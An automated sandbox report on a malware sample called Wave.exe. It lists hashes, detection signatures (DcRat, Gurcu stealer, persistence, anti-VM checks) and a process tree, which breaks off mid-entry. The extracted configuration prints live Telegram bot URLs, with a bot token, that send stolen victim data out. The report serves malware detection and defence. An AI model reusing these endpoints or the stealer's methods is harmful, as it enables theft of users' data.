Analysis

  • max time kernel
    600s
  • max time network
    599s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-07-2024 18:48

General

  • Target

    Wave.exe

  • Size

    8.7MB

  • MD5

    658cf2d0529f97f6f04bb78b151dc207

  • SHA1

    4af0fb55a3343f885f43af09bd11f235dcfded2d

  • SHA256

    85edeebdb49bff8eede6ecc42928d9b0f6d120b0e4a3a88fe59c9b7cb62b2cac

  • SHA512

    d2361c08291037d177cbe8b546cb65fbfc5361fe676114919edc69bbecc90b31dd37ef9ef41ceab00b560ee26e264eaa702eeb32bb9ff5659767a2c41b9a7dce

  • SSDEEP

    196608:WCpTIWsrEhW5hcePglVrOUv5JpkMZxShCZxD43eQpMqX:Wg89rEShcWgldrjwcZxD4OQeqX

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20cb2f7d9fb5d7fafd213be9f3e866f8347763b7f5%0A%E2%80%A2%20Comment%3A%20proliv%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20WQMJVIBL%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CmswebFonthost%5Cbrowserwinsvc.ex

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendDocument?chat_id=7391062786&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20cb2f7d9fb5d7fafd213be9f3e866f8347763b7f5%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A28.908646

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendDocument?chat_id=7391062786&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20cb2f7d9fb5d7fafd213be9f3e866f8347763b7f5%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A08.533138

Signatures

  • DcRat 64 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 23 IoCs
  • Process spawned unexpected child process 64 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 10 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • .NET Reactor proctector 5 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 22 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 35 IoCs
  • Loads dropped DLL 57 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 46 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 27 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 27 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 39 IoCs
  • NTFS ADS 1 IoCs
  • Runs regedit.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 8 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Wave.exe
    "C:\Users\Admin\AppData\Local\Temp\Wave.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3332
    • C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
      "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:944
      • C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe
        "C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2796
        • C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe
          "C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks for any installed AV software in registry
          • Drops file in Program Files directory
          PID:4788
          • C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe
            "C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe" --type=gpu-process --no-sandbox --locales-dir-path="C:\Users\Admin\AppData\Local\CefSharp\locales" --resources-dir-path="C:\Users\Admin\AppData\Local\CefSharp" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CefSharp" --cefsharpexitsub --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2072,i,2768720679597987612,2417208657726558225,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --enable-logging=handle --log-file=2100 --mojo-platform-channel-handle=2056 /prefetch:2 --host-process-id=4788
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1724
          • C:\Users\Admin\AppData\Local\Luau Language Server\node.exe
            "C:\Users\Admin\AppData\Local\Luau Language Server\node.exe" server --process-id=4788
            5⤵
            • Executes dropped EXE
            PID:3348
          • C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe
            "C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --locales-dir-path="C:\Users\Admin\AppData\Local\CefSharp\locales" --resources-dir-path="C:\Users\Admin\AppData\Local\CefSharp" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CefSharp" --cefsharpexitsub --field-trial-handle=1972,i,2768720679597987612,2417208657726558225,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --enable-logging=handle --log-file=2808 --mojo-platform-channel-handle=2792 /prefetch:3 --host-process-id=4788
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1176
          • C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe
            "C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:3200
          • C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe
            "C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --locales-dir-path="C:\Users\Admin\AppData\Local\CefSharp\locales" --resources-dir-path="C:\Users\Admin\AppData\Local\CefSharp" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CefSharp" --cefsharpexitsub --field-trial-handle=4360,i,2768720679597987612,2417208657726558225,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --enable-logging=handle --log-file=3884 --mojo-platform-channel-handle=4356 /prefetch:8 --host-process-id=4788
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:4388
          • C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe
            "C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-sandbox --locales-dir-path="C:\Users\Admin\AppData\Local\CefSharp\locales" --resources-dir-path="C:\Users\Admin\AppData\Local\CefSharp" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CefSharp" --cefsharpexitsub --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3964,i,2768720679597987612,2417208657726558225,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --enable-logging=handle --log-file=3968 --mojo-platform-channel-handle=2676 /prefetch:8 --host-process-id=4788
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2228
    • C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3032
      • C:\Users\Admin\AppData\Local\Temp\Jopasobaki.exe
        "C:\Users\Admin\AppData\Local\Temp\Jopasobaki.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3684
        • C:\Users\Admin\AppData\Local\Temp\Result.exe
          "C:\Users\Admin\AppData\Local\Temp\Result.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4208
          • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
            "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2648
            • C:\Windows\SysWOW64\msiexec.exe
              "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1752
            • C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe
              "C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart
              6⤵
              • Executes dropped EXE
              PID:1292
              • C:\Windows\Temp\{CF677528-A08B-406A-81A3-1B2B8C1AD61A}\.cr\vc_redist.x64.exe
                "C:\Windows\Temp\{CF677528-A08B-406A-81A3-1B2B8C1AD61A}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=548 /install /quiet /norestart
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:3880
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe
              6⤵
              • Enumerates system info in registry
              • Modifies registry class
              • NTFS ADS
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              PID:4016
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee8fc46f8,0x7ffee8fc4708,0x7ffee8fc4718
                7⤵
                  PID:4156
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
                  7⤵
                    PID:5116
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
                    7⤵
                      PID:2960
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
                      7⤵
                        PID:1416
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
                        7⤵
                          PID:3556
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1
                          7⤵
                            PID:3856
                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
                            7⤵
                              PID:544
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
                              7⤵
                                PID:3960
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3136 /prefetch:8
                                7⤵
                                  PID:2360
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
                                  7⤵
                                    PID:4788
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6032 /prefetch:8
                                    7⤵
                                      PID:4480
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
                                      7⤵
                                        PID:3820
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
                                        7⤵
                                          PID:2572
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
                                          7⤵
                                            PID:4032
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1
                                            7⤵
                                              PID:4896
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5516 /prefetch:2
                                              7⤵
                                                PID:4812
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
                                                7⤵
                                                  PID:5892
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
                                                  7⤵
                                                    PID:5916
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                                                    7⤵
                                                      PID:6048
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
                                                      7⤵
                                                        PID:804
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                                        7⤵
                                                          PID:5460
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5528 /prefetch:8
                                                          7⤵
                                                            PID:3800
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4012 /prefetch:8
                                                            7⤵
                                                            • Modifies registry class
                                                            PID:1936
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
                                                            7⤵
                                                              PID:5668
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
                                                              7⤵
                                                                PID:4936
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
                                                                7⤵
                                                                  PID:5624
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
                                                                  7⤵
                                                                    PID:220
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
                                                                    7⤵
                                                                      PID:5328
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
                                                                      7⤵
                                                                        PID:5972
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
                                                                        7⤵
                                                                          PID:5532
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:1
                                                                          7⤵
                                                                            PID:5740
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7464 /prefetch:1
                                                                            7⤵
                                                                              PID:1828
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
